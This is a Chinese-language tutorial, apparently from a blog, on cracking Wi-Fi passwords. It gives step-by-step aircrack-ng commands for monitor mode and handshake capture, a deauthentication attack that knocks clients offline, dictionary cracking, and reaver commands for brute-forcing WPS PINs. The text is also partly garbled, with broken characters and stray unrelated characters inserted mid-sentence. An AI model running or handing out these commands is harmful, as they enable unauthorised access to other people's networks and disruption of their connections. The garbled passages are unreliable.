wifi加密方式
1.不啟用安全??
??2.WEP??
?3.WPA/WPA2-PSK(預(yù)共享密鑰)??
?4.WPA/WPA2 802.1X (radius認(rèn)證)
WEP??加密方式的破解
wep加密方式99.99%可以破解(排除0.01%的人品問題)蚓耽,所以基本已經(jīng)絕跡了丙躏,這里就不過多描述哺壶。如果真遇到此奇葩加密方式味混,可以參考這里 使用Aircrack-ng破解WEP加密類型的無線網(wǎng)絡(luò)
WPA/WPA2-PSK加密方式的破解
使用Aircrack-ng工具爬凑,依次輸入以下命令
防止設(shè)備繁忙
1.airmon-ng check kill
查看無線網(wǎng)卡狀態(tài)
2.ifconfig/iwconfig/ifconfig -a
加載無線網(wǎng)卡,已加載則忽略
3.ifconfig wlan0 up
激活網(wǎng)卡
4.airmon-ng start wlan0
探測無線網(wǎng)絡(luò)
5.airodump-ng mon0
如果出現(xiàn)“Device or resource busy”錯誤院崇,請參考 出現(xiàn)設(shè)備繁忙的解決方法
airodump-ng常用參數(shù):--wps摔寨、--essid迈着、-c竭望、-bssid
開始抓包
6.airodump-ng --ivs -w finame -c 6 mon0
ivs是通過ivs過濾,只保留可以破解密碼的報文.ivs文件裕菠,這樣比較快點咬清;-w是將抓取的報文寫入命名為abc并保存(之后會在當(dāng)前文件夾保存為abc-01.ivs);-c后面跟頻道奴潘,如這里的6
airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w finame mon0
deauth攻擊旧烧,獲取握手包
7.aireplay-ng -0 大小 -a 主機(jī)mac -c 客戶端mac mon0
攻擊時網(wǎng)卡必須和需要破解的wifi在同一頻道。
deauth攻擊為了獲得握手包萤彩,會讓鏈接的客戶端斷開粪滤。
如果出現(xiàn)“interfaceX is on channel Y, but the AP uses channel Z”斧拍,請輸入:
sudo iwconfig wlan0 channel wifi的頻道
跑字典破解
8.aircrack-ng -w password.lst finame-01.cap
本機(jī)測試時雀扶,大約為1.6k/s。也就是1分鐘跑9.6萬條密碼。跑完字典大概40多分鐘(字典比較小愚墓,共有3741905條密碼)
利用路由器wps功能漏洞予权,跑pin碼破解
輸入命令
reaver -i mon0 -b MAC地址 -a -S -vv -d1 -t 3 -c 1
后續(xù)教程計劃:
1.彩虹表破解
2.使用GPU加速破解
3.集群破解
推薦閱讀
參考資料
1.WPA-PSK無線網(wǎng)絡(luò)破解原理及過程
2.WIFI滲透從入門到精通
3.wpa wpa2類型的無線密碼
4.出現(xiàn)設(shè)備繁忙的解決方法
5.利用wps漏洞窮舉PIN碼破解wifi密碼
6.Kali Linux中前十名的Wifi攻擊工具
7.Aireplay-ng的6種攻擊模式詳解
8.如何用GPU破解無線密碼
9.使用GPU加速工具PYRIT極速破解無線密碼